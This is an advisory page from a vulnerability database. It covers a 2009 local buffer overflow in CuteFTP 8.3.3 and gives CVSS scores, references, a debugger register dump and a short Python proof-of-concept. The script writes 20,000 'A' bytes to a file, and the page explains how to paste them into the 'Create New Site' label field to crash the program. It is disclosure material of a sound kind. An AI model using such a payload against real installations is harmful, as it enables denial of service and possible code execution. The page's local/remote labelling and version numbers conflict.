CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC

2009-10-01 / 2009-10-02
Credit: Dr_IDE
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/env python # CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC # Found By: Dr_IDE # Download: http://www.cuteftp.com/downloads/ # Tested On: Windows 7 RC, XP might be more shell friendly # Notes: This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work. # Because of differences in the internal process of each site type you may be able to get # execution through one of these channels. # ##################################################################################################### """ EAX 02120000 ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EDX 41414141 EBX 00004141 ESP 0018C160 EBP 0018C230 ESI 0228BA88 EDI 41414141 EIP 77843913 ntdll.77843913 C 0 ES 002B 32bit 0(FFFFFFFF) P 0 CS 0023 32bit 0(FFFFFFFF) A 1 SS 002B 32bit 0(FFFFFFFF) Z 0 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty -??? FFFF 000000FF 00FF00FF ST1 empty -??? FFFF 00000000 00008200 ST2 empty -??? FFFF 00010000 00010000 ST3 empty 431.99999034404754640 ST4 empty 1.0000000000000000000 ST5 empty 1.0000000000000000000 ST6 empty 16.000000000000000000 ST7 empty 16.000000000000000000 3 2 1 0 E S P U O Z D I FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 """ buff = ("\x41" * 20000) try: f1 = open("CuteFTP.txt","w"); f1.write(buff); f1.close(); print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC" print "By: Dr_IDE" print "\nFile Created Successfully.\n" print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom." except: print "[-] Error. File couldn't be created."

References:

http://xforce.iss.net/xforce/xfdb/53487
http://www.packetstormsecurity.org/0909-exploits/Dr_IDE-CuteFTP_FTP_8.3.3-PoC.py.txt
http://www.osvdb.org/58387
http://secunia.com/advisories/36874


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top